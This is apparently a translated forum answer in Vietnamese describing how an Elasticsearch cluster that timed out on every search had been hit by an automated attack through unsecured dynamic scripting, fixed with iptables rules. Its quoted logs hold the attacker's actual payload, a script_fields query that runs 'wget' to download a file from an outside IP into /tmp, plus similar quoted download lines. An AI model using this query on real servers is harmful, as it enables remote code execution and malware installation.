Elasticsearch hết thời gian chờ đối với mọi yêu cầu tìm kiếm cho đến khi khởi động lại

Vấn đề đã được giải quyết:

Nguyên nhân: Một cuộc tấn công bằng rô-bốt vào các máy chủ của chúng tôi không được bảo mật.

Theo một bài báo được đăng bởiasticsearch:

https://www.elastic.co/blog/scripting-security/

Hành động đã thực hiện: Chúng tôi đã thêm các quy tắc iptables vào máy chủ con rối của mình để áp dụng tất cả các máy chủ tìm kiếm đàn hồi của chúng tôi.

Chúng tôi đã phạm sai lầm đó và rất tiếc là chúng tôi đã phải trả giá. Chúng tôi đã trở lại và hoạt động ngay bây giờ.

Theo nhật ký, tôi thấy có điều gì đó rất đáng ngờ

[2015-04-30 05:05:59,808][DEBUG][action.search.type       ] [Saint Anna] [_river][0], node[Oq7k-P26RoabKCjZ_YmlIw], [P], s[STARTED]: Failed to execute [[email protected]] lastShard [true]
org.elasticsearch.transport.RemoteTransportException: [Anaconda][inet[/192.168.5.2:9300]][indices:data/read/search[phase/query]]
Caused by: org.elasticsearch.search.SearchParseException: [_river][0]: query[ConstantScore(*:*)],from[-1],size[-1]: Parse Failure [Failed to parse source [{"query": {"filtered": {"query": {"match_all": {}}}}, "script_fields": {"exp": {"script": "import java.util.*;import java.io.*;String str = \"\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\"wget -O /tmp/xiao3 http://121.42.221.14:666/xiao3\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}}, "size": 1}]]

Tôi sẽ lược bớt phần chính:

exec(\"wget -O /tmp/xiao3 http://121.42.221.14:666/xiao3\")

Đây là một hình thức tấn công bằng rô-bốt, vì chúng tôi không có ai tên là xiao hoặc chúng tôi không đặt máy chủ của mình ở Trung Quốc (Theo GEO-IP), chúng tôi đã nghi ngờ đường dây này.

Theo bài báo nêu trên:

[Error: Runtime.getRuntime().exec("wget http://XXX.XXX.XX.XXX/.../4.sh -O /tmp/.4.sh").getInputStream(): Cannot run program "wget": error=2, No such file or directory]
Caused by: java.io.IOException: Cannot run program "wget": error=2, No such file or directory
[Error: Runtime.getRuntime().exec("wget http://XXX.XXX.XX.XXX/.../getsetup.hb").getInputStream(): Cannot run program "wget": error=2, No such file or directory]
After vulnerable systems have been exploited, the infected system is running code in the /boot/.iptables file as well as modified /etc/init.d scripts.

Tin tặc đã áp dụng một số truy vấn khó chịu khiến tìm kiếm đàn hồi của chúng tôi ngừng hoạt động.

Chúng tôi đã khởi động lại máy chủ của mình và thêm Iptables, và chúng tôi đã hoạt động trở lại.